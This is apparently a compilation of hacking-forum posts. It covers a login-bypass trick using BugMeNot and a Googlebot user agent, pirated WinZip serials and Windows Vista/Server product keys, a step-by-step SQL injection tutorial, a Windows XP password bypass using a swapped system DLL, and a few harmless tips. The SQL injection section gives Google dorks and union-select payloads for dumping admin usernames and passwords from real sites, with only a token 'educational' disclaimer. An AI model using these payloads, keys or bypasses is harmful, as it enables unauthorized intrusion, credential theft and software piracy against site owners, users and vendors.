Free Access To Websites Without Registering

You can have an access to any websites free without registering

Go to

-http://bugmenot.com/

and type the URL of the website you want to log into.
Examples:

-http://www.nytimes.com/, -http://www.winnetmag.com/
etcetera.

Another (and better) way is changing the user agent of your browser to:
Googlebot/2.1+

-http://www.googlebot.com/bot.html

This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from

-http://www.chrispederick.com/work/firefox/useragentswitcher/
and add the Googlebot user agent.

Have fun,
don't forget to like and share wit ur frndZ

- Now just browsing entire forum without even needing to login to view restricted areas, and it works on other sites
And no, you cant access the hidden forums either, already tried that

21 Year Old Hacker...




Kristina Svechinskaya, worlds most beautiful lady black hat hacker !!She is only 21 and already hacked 3 million dollar from U.S.A bank account and 9.5 million pound from U.K bank account.

Chat with your friend with your command prompt

HEAR R THE STEPS>>>

1. All you need is your friends IP address and your Command Prompt.

2. Open your notepad and write tis code as it is.................. I would prefer you to copy this !

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3. Now save this as "Messenger.Bat".

4. Drag this file (.bat file)over to Command Prompt and press enter!

5. You would then see some thing like this:

MESSENGER
User:

6. After "User" type the IP address of the computer you want to contact.

7. Before you press "Enter"
it should look like this:

MESSENGER
User: IP_Address
Message: Hi, How are you ?

8. Now all you need to do is press "Enter",
and start chatting

ENJOY YOUR SELF.........

WinZip Keys

WinZip Pro 15.0 Build 9302

Name: Mulder
s/n: ggpbd-vebe4-icft3-pkhht-cimsa-njdclzo

Name: Scully
s/n: dnqzo-vf3i9-s2sop-ictd4-v9jxa-jgdclzo

WinZip Standard 15.0 Build 9302

Name: Mulder
s/n: xbq4m-6kaui-s44sc-p3bgw-msaua-6hdclzo

WinZip Pro 15.0 (9302)

Name: thejimmydg
Serial: plqx3-mulga-uifdm-pj2ea-eezma-lkdclzo

Name: TJDG
Serial: ysfym-vq39h-3zeed-6kzdq-ntjza-rqdclzo

Name: Winzip Pro
Serial: ozniv-g6wz9-tkrvr-nfvex-oppga-lydcjdg

Vista Genuine Keys

Windows Vista Business:
6QQW2-XHVBY-3P47M-TQDY2-CDWYY
PVK4K-49YX6-VX4Q4-JQJT6-8Q3JC
FJG7P-8M32X-JQ4P4-BYMHG-JKWJC

Windows Vista Home Premium:
KG843-7KP9F-WY989-X7PV3-DPX2P
2KTJJ-RVD7C-2KM4D-9VDPR-WJ6Q2
H2H8G-DMC9W-XCPYW-BBHQP-RGP47

Windows Vista Ultimate:
TTVGK-T3YYP-HGHF6-B998H-92XRR
7RTRH-FQGFR-3VYBC-H6DCH-C6HJW
RB66W-M3HPP-999B8-MXGWY-XFJF8
>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Vista|Ultimate|Acer|3YDB8-YY3P4-G7FCW-GJMPG-VK48C

Vista|Business|Acer|2TJTJ-C72D7-7BCYH-FV3HT-JGD4F

Vista|BusinessN|Acer|2434H-HFRM7-BHGD4-W9TTD-RJVCH

Vista|HomeBasic|Acer|2W7FD-9DWCB-Q9CM8-KTDKK-8QXTR

Vista|HomeBasicN|Acer|22TC9-RDMDD-VXMXD-2XM2Y-DT6FX

Vista|HomePremium|Acer|2TYBW-XKCQM-XY9X3-JDXYP-6CJ97

Vista|Starter|Acer|26VQB-RP3T9-63FVV-VD7RF-H7M2Q

Server|SBS|Dell|76GGM-4MQ6T-XCJH9-6R2XQ-PW2D2

Server|Business|Dell|76GGM-4MQ6T-XCJH9-6R2XQ-PW2D2

Server|Enterprise|Dell|26Y2H-YTJY6-CYD4F-DMB6V-KXFCQ

Server|Standard|Dell|223PV-8KCX6-F9KJX-3W2R7-BB2FH

Hack through Sql injection


Before we see what SQL Injection is. We should know what SQL and Database are.

Database: 
Database is collection of data. In website point of view, database is used for storing user ids, passwords, web page details and more. 

Some List of Database are: 

* DB servers,
* MySQL(Open source), 
* MSSQL, 
* MS-ACCESS, 
* Oracle, 
* Postgre SQL(open source), 
* SQLite, 

SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language. 


Definition from Complete reference:
SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database. 

Simple Basic Queries for SQL: 

Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users; 

Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("hackersgrp","kumar"); 

I will give more detail and query in my next thread about the SQL QUERY. 


What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database. 


What an attacker can do? 


* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server 


Now let's dive into the real procedure for the SQL Injection.
Follow my steps. 


Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites. 

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid= 

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website. 

Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg: 

site:www.victimsite.com inurl:index.php?id= 

Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg: 

http://www.victimsite.com/index.php?id=2' 

If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable. 

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!! 
For eg: 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table. 
For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement) 

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ". 

For eg: 

http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4

change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1". 

I mean: 

http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)


so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement. 
For eg: 

http://www.victimsite.com/index.php?id=2 order by 1-- 

Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,). 

For eg:
if the number of columns is 7 ,then the query is as follow: 

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7-- 
It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns). 

Like this:


Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7-- 

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7-- 

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7-- 

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7-- 

Step 6: Finding the Table Name
if the version is 5 or above. Then follow these steps. Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()-- Now it will show the list of table names. Find the table name which is related with the admin or user. 

Now select the "admin " table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser). It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
Now
select sql->Mysql->MysqlChar() 


This will open the small window ,enter the table name which you found. i am going to use the admin table name.


click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.



copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)-- 

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.

Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:

http://www.victimsite.com/index.php?id=-2 
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin-- 

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password. 
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs. 
Step 8: Finding the Admin Panel:
Just try with url like:

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/ 

etc.
If you have luck ,you will find the admin page using above urls. or try this list .
Note:
This is just for educational purpose only. Discussing or Reading about thief technique is not crime but implementing.

How to hack into windows xp without changing password




There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorization.

Steps to Hack into a Windows XP Computer without changing password:

1. Get physical access to the machine. Remember that it must have a CD or
DVD drive.

2. Download DreamPackPL http://depositfiles.com/en/files/395974

3. Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO

4. Use any burning program that can burn ISO images

5. After you have the disk, boot from the CD or DVD drive. You will see
Windows 2000 Setup and it will load some files.

6. Press “R” to install DreamPackPL.

7. Press “C” to install DreamPackPL by using the recovery console.

8. Select the Windows installation that is currently on the computer (Normally
is“1″ if you only have one Windows installed)

9. Backup your original sfcfiles.dll by typing:“ren C:\Windows\System32
\sfcfiles.dll sfcfiles.lld” (without quotes)

10. Copy the hacked file from CD to system32 folder. Type:“copy D:\i386
\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and
assuming your CD drive is D:)

11. Type “exit”, take out disk and reboot.

12. In the password field, type “dreamon” (without quotes) and DreamPack
menu will appear.

13. Click the top graphic on the DreamPack menu and you will get a menu
popup.

14. Go to commands and enable the options and enable the god command.

15. Type “god” in the password field to get in Windows.You can also go to
Passwords and select “Logon with wrong password and hash”.

This option allows you to login with ANY password.

Access another computer using google chrome


You can access another computer using google chrome with out Rats system.
it work on every computer if you have google chrome and you can download it by chrome app store.
Download chrome remote desktop BETA https://chrome.google.com/webstore/detail/gbchcmhmhahfdphkhkmpfmihenigjmpp

HOW TO WORK WITH THIS APPLICATION

1. After installation goto the start page

2. Click on the Chrome Remote app to open it

3. Click continue and you will asked to allow access to your data. proceed with allowing access.

4. Then it will ask you whether you want to share your own computer to some other system or connect to a shared computer.

5. If you clicked share this computer, then it will generate automatic sharing code.

6. Just send this code to your partner to connect to your system

7. Once connected you will see their desktop

Thats all you have to do,
if you have suggestion or comment question write BELOW

thanx for reading!!

Ethical Hacking Lab


[TUT] Set up your Pen Testing / Ethical Hacking Lab with a single Computer

Hi Hackers_grp members, I like to teach you how to set up your own Pen Testing/ hacking network Lab.

Use of your own Pen Testing Lab:
Free, free ,free..! It's free lab, because it is yours..
Only one system is enough
can Practice your pentesting/hacking skills
can install any kind of malwares(spyware,trojan) or RATs and test how it works
and more ...

is it possible to create a lab with single system?
Yes, you can. we are going to set up lot of vulnerable system virtually . Confused? VirtualBox is open source software provided by Oracle corp that allows to run multiple guest OS(virtual system) in a single system .

Requirements:

Virtual box latest version and its extension (get it from here:http://www.virtualbox.org/)

Windows XP image file(xp.iso) ; it is going to be our target system
Backtrack Linux image file(backtrack5.iso); we are going to launch the attack from this OS.

First of all, Learn how to configure the Guest OS in VirtualBox from here:

Code:
https://www.virtualbox.org/manual/UserManual.html

This page will you explain everything about Virtualbox and how to setup Guest OS.

I hope you now familiar with installing Guest OS.

Set Up your Target system:
Now we have to set up the target system. Install the Windows XP in VirtualBox using the xp.iso file. After installation completed, disable the Firewall in xp so that it can become more vulnerable system.

Set up your PenTesting System:
Install the Backtrack5 in Virtualbox. Backtrack is penetration testing Linux that has lot of hacking tools . We will hack the target system using this backtrack.

Network Settings for Guest Os:

Step 1:
click the File menu in Virtualbox and select Preference
Now select the Network Tab
Click the + symbol in the side that will add a new Host only network



Step2:

Right click on the Guest OX(eg:xp,backtrack) and select the Settings.
Select Network tab.
Now you can see the "Attached to" option menu.
change it from NAT to "Host only Adapter"


Do the same thing for both Guest OS.

Step 3:


Now run the both guest os .
Finding the IP address of Target System:
open the Windows XP Guest OS window.
open the cmd in Windows XP and type ipconfig
This will show the ip address of XP. It will be 192.168.56.101

Hacking with Pen Testing System:
open the Terminal and type "nmap 192.168.56.101".
Now it will show the list of open port.

You can hack the target system with open ports

SHOW UR DESKTOP,PHOTOS OR VIDEOS TO UR FRIENDS ON WEBCAM





SHOW UR DESKTOP,PHOTOS OR VIDEOS TO UR PARTNER ON WEBCAM
by using MANYCAM u can show ur desktop to ur chat-mate ..its the main n amazing feature of this software but in spite of this there are more great features in MANYCAM.
# record the video by webcam
# play movie on webcam
# take snapshots with effects
# write text on webcam
# show time and date on webcam
to know more just install this software :D

http://www.softpedia.com/get/Internet/Chat/Instant-Messaging/Manycam.shtml